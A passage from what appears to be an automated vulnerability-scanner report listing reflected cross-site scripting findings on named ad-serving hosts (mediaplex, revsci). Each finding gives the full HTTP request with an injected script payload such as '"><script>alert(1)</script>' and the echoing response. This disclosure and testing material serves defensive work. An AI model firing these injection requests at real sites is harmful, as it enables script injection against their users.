Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:34:25 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 16:53:10 GMT
ETag: "5fa04f-cd8-4987b4998e980"
Accept-Ranges: bytes
Content-Length: 6326
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028289014de4ec";alert(1)//371d15fe709&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">
...[SNIP]...

1.182. http://img.mediaplex.com/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49c55"%3balert(1)//4a80fa0abd1 was submitted in the mpck parameter. This input was echoed as 49c55";alert(1)//4a80fa0abd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-2042-2%2F4%3Fmpt%3D1297647243%26siteid%3D0%26Perf_Tracker_1%3D0000777384%26Perf_Tracker_2%3D0000951470%26Perf_Tracker_3%3D1183%26adid%3D307892%26imp_id%3D6707832263625275206%26fcid%3D307892%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f38018c%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26rvr_id%3D21007378077849c55"%3balert(1)//4a80fa0abd1&mpt=1297647243&siteid=0&Perf_Tracker_1=0000777384&Perf_Tracker_2=0000951470&Perf_Tracker_3=1183&adid=307892&imp_id=6707832263625275206&fcid=307892&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f38018c&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&rvr_id=210073780778&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%2FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAEb3SXbnARddBWHfHSmrEEKLhlhNAAAAAI9bAwBkAAAAZAAAAAIAAABwUQIAh7wAAAEAAABVU0QAVVNEALQAlgBUAAAAxgUAAgMCAAUAAAAAShEJRQAAAAA.%2Fcnd%3D%21tBF7vwj4uwIQ8KIJGAAgh_kCKAAxAAAAAAAAAABCEwgAEAAYACABKP7__________wFIAFAAWFRgA2hk%2Freferrer%3Dhttp%253A%252F%252Foptimized-by.rubiconproject.com%252Fa%252Fdk.html%253Fdefaulting_ad%253Dx300f22.js%2526size_id%253D18%2526account_id%253D6005%2526site_id%253D12414%2526size%253D180x150%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000777384%252Fmnum%253D0000951470%252Fcstr%253D75633200%253D_4d58868a%252C6132271880%252C777384%255E951470%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D75633200%252Foptn%253D64%253Ftrg%253D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:10 GMT
Server: Apache
Last-Modified: Mon, 31 Jan 2011 17:54:29 GMT
ETag: "4fb837-cd0-49b281b7cbf40"
Accept-Ranges: bytes
Content-Length: 17689
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";
var ckp = "http://img-cdn.mediaplex.com/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.jpg";
ckp = ckp.replace(/.*\/.*\/([0-9]*)_(
...[SNIP]...
adid=307892&imp_id=6707832263625275206&fcid=307892&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f38018c&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&rvr_id=21007378077849c55";alert(1)//4a80fa0abd1\" target=\"_blank\">
...[SNIP]...

1.183. http://img.mediaplex.com/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba7e4"%3balert(1)//0517f93f112 was submitted in the mpvc parameter. This input was echoed as ba7e4";alert(1)//0517f93f112 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-2042-2%2F4%3Fmpt%3D1297647243%26siteid%3D0%26Perf_Tracker_1%3D0000777384%26Perf_Tracker_2%3D0000951470%26Perf_Tracker_3%3D1183%26adid%3D307892%26imp_id%3D6707832263625275206%26fcid%3D307892%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f38018c%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26rvr_id%3D210073780778&mpt=1297647243&siteid=0&Perf_Tracker_1=0000777384&Perf_Tracker_2=0000951470&Perf_Tracker_3=1183&adid=307892&imp_id=6707832263625275206&fcid=307892&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f38018c&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&rvr_id=210073780778&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%2FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAEb3SXbnARddBWHfHSmrEEKLhlhNAAAAAI9bAwBkAAAAZAAAAAIAAABwUQIAh7wAAAEAAABVU0QAVVNEALQAlgBUAAAAxgUAAgMCAAUAAAAAShEJRQAAAAA.%2Fcnd%3D%21tBF7vwj4uwIQ8KIJGAAgh_kCKAAxAAAAAAAAAABCEwgAEAAYACABKP7__________wFIAFAAWFRgA2hk%2Freferrer%3Dhttp%253A%252F%252Foptimized-by.rubiconproject.com%252Fa%252Fdk.html%253Fdefaulting_ad%253Dx300f22.js%2526size_id%253D18%2526account_id%253D6005%2526site_id%253D12414%2526size%253D180x150%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000777384%252Fmnum%253D0000951470%252Fcstr%253D75633200%253D_4d58868a%252C6132271880%252C777384%255E951470%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D75633200%252Foptn%253D64%253Ftrg%253Dba7e4"%3balert(1)//0517f93f112 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:14 GMT
Server: Apache
Last-Modified: Mon, 31 Jan 2011 17:54:29 GMT
ETag: "4fb837-cd0-49b281b7cbf40"
Accept-Ranges: bytes
Content-Length: 17665
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";
var ckp = "http://img-cdn.mediaplex.com/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.jpg";
ckp = ckp.replace(/.*\/.*\/([0-9]*)_(
...[SNIP]...
dvertising.com%2Fclick%2Fsite%3D0000777384%2Fmnum%3D0000951470%2Fcstr%3D75633200%3D_4d58868a%2C6132271880%2C777384%5E951470%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D75633200%2Foptn%3D64%3Ftrg%3Dba7e4";alert(1)//0517f93f112http://rover.ebay.com%2Frover%2F1%2F711-118167-2042-2%2F4%3Fmpt%3D1297647243%26siteid%3D0%26Perf_Tracker_1%3D0000777384%26Perf_Tracker_2%3D0000951470%26Perf_Tracker_3%3D1183%26adid%3D307892%26imp_id%3D
...[SNIP]...

1.184. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27cd5"><script>alert(1)</script>c7aa141f23a was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f39ba0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_U3%3D57988%26ir_DAP_I117%3D11450%26ir_DAP_I123%3D1059%26ir_DAP_I117%3D11450%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D21008054256927cd5"><script>alert(1)</script>c7aa141f23a&mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=210080542569&mpvc=http%3A%252F%252Fadlog%252Ecom%252Ecom%252Fadlog%252Fe%252Fr%253D14588%2526sg%253D488020%2526o%253D250%253a503544%253a%2526h%253Dcn%2526p%253D2%2526b%253D55%2526l%253Den_US%2526site%253D162%2526pt%253D8301%2526nd%253D503544%2526pid%253D%2526cid%253D20031629%2526pp%253D100%2526e%253D%2526rqid%253D01phx1-ad-e19%3A4D580CEF81F4C1%2526orh%253Dcbsnews.com%2526oepartner%253D%2526epartner%253D%2526ppartner%253D%2526pdom%253Dwww.cbsnews.com%2526cpnmodule%253D%2526count%253D%2526ra%253D173.193.214.243%2526pg%253D%2526t%253D2011.02.14.01.34.36%2526event%253d58%252f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:57 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 18:45:33 GMT
ETag: "494a63-22a9-49a234e2dcd40"
Accept-Ranges: bytes
Content-Length: 22215
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http:%2F%2Fadlog%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D14588%26sg%3D488020%26o%3D250%3a503544%3a%26h%3Dcn%26p
...[SNIP]...
b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=21008054256927cd5"><script>alert(1)</script>c7aa141f23a" TARGET="_blank">
...[SNIP]...

1.185. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51fd6"%3balert(1)//2297f36f9b7 was submitted in the mpck parameter. This input was echoed as 51fd6";alert(1)//2297f36f9b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f39ba0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_U3%3D57988%26ir_DAP_I117%3D11450%26ir_DAP_I123%3D1059%26ir_DAP_I117%3D11450%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D21008054256951fd6"%3balert(1)//2297f36f9b7&mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=210080542569&mpvc=http%3A%252F%252Fadlog%252Ecom%252Ecom%252Fadlog%252Fe%252Fr%253D14588%2526sg%253D488020%2526o%253D250%253a503544%253a%2526h%253Dcn%2526p%253D2%2526b%253D55%2526l%253Den_US%2526site%253D162%2526pt%253D8301%2526nd%253D503544%2526pid%253D%2526cid%253D20031629%2526pp%253D100%2526e%253D%2526rqid%253D01phx1-ad-e19%3A4D580CEF81F4C1%2526orh%253Dcbsnews.com%2526oepartner%253D%2526epartner%253D%2526ppartner%253D%2526pdom%253Dwww.cbsnews.com%2526cpnmodule%253D%2526count%253D%2526ra%253D173.193.214.243%2526pg%253D%2526t%253D2011.02.14.01.34.36%2526event%253d58%252f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:00 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 18:45:33 GMT
ETag: "494a63-22a9-49a234e2dcd40"
Accept-Ranges: bytes
Content-Length: 21999
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http:%2F%2Fadlog%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D14588%26sg%3D488020%26o%3D250%3a503544%3a%26h%3Dcn%26p
...[SNIP]...
b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=21008054256951fd6";alert(1)//2297f36f9b7", "6781558", "<geozip/>
...[SNIP]...

1.186. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d29e"%3balert(1)//977552208d was submitted in the mpvc parameter. This input was echoed as 1d29e";alert(1)//977552208d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f39ba0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_U3%3D57988%26ir_DAP_I117%3D11450%26ir_DAP_I123%3D1059%26ir_DAP_I117%3D11450%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D210080542569&mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=210080542569&mpvc=http%3A%252F%252Fadlog%252Ecom%252Ecom%252Fadlog%252Fe%252Fr%253D14588%2526sg%253D488020%2526o%253D250%253a503544%253a%2526h%253Dcn%2526p%253D2%2526b%253D55%2526l%253Den_US%2526site%253D162%2526pt%253D8301%2526nd%253D503544%2526pid%253D%2526cid%253D20031629%2526pp%253D100%2526e%253D%2526rqid%253D01phx1-ad-e19%3A4D580CEF81F4C1%2526orh%253Dcbsnews.com%2526oepartner%253D%2526epartner%253D%2526ppartner%253D%2526pdom%253Dwww.cbsnews.com%2526cpnmodule%253D%2526count%253D%2526ra%253D173.193.214.243%2526pg%253D%2526t%253D2011.02.14.01.34.36%2526event%253d58%252f1d29e"%3balert(1)//977552208d HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:11 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 18:45:33 GMT
ETag: "494a63-22a9-49a234e2dcd40"
Accept-Ranges: bytes
Content-Length: 21905
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http:%2F%2Fadlog%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D14588%26sg%3D488020%26o%3D250%3a503544%3a%26h%3Dcn%26p
...[SNIP]...
4D580CEF81F4C1%26orh%3Dcbsnews.com%26oepartner%3D%26epartner%3D%26ppartner%3D%26pdom%3Dwww.cbsnews.com%26cpnmodule%3D%26count%3D%26ra%3D173.193.214.243%26pg%3D%26t%3D2011.02.14.01.34.36%26event%3d58%2f1d29e";alert(1)//977552208dhttp://rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa1
...[SNIP]...

1.187. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d4fe"><script>alert(1)</script>f4af9e30ca7 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f39ba0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_U3%3D57988%26ir_DAP_I117%3D11450%26ir_DAP_I123%3D1059%26ir_DAP_I117%3D11450%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D210080542569&mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=210080542569&mpvc=http%3A%252F%252Fadlog%252Ecom%252Ecom%252Fadlog%252Fe%252Fr%253D14588%2526sg%253D488020%2526o%253D250%253a503544%253a%2526h%253Dcn%2526p%253D2%2526b%253D55%2526l%253Den_US%2526site%253D162%2526pt%253D8301%2526nd%253D503544%2526pid%253D%2526cid%253D20031629%2526pp%253D100%2526e%253D%2526rqid%253D01phx1-ad-e19%3A4D580CEF81F4C1%2526orh%253Dcbsnews.com%2526oepartner%253D%2526epartner%253D%2526ppartner%253D%2526pdom%253Dwww.cbsnews.com%2526cpnmodule%253D%2526count%253D%2526ra%253D173.193.214.243%2526pg%253D%2526t%253D2011.02.14.01.34.36%2526event%253d58%252f6d4fe"><script>alert(1)</script>f4af9e30ca7 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:08 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 18:45:33 GMT
ETag: "494a63-22a9-49a234e2dcd40"
Accept-Ranges: bytes
Content-Length: 22129
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http:%2F%2Fadlog%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D14588%26sg%3D488020%26o%3D250%3a503544%3a%26h%3Dcn%26p
...[SNIP]...
4D580CEF81F4C1%26orh%3Dcbsnews.com%26oepartner%3D%26epartner%3D%26ppartner%3D%26pdom%3Dwww.cbsnews.com%26cpnmodule%3D%26count%3D%26ra%3D173.193.214.243%26pg%3D%26t%3D2011.02.14.01.34.36%26event%3d58%2f6d4fe"><script>alert(1)</script>f4af9e30ca7http://rover.ebay.com/rover/1/711-118167-1915-16/4?mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&
...[SNIP]...

1.188. http://js.revsci.net/gateway/gw.js [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 61c78<script>alert(1)</script>60081d2e459 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=J0553161c78<script>alert(1)</script>60081d2e459 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
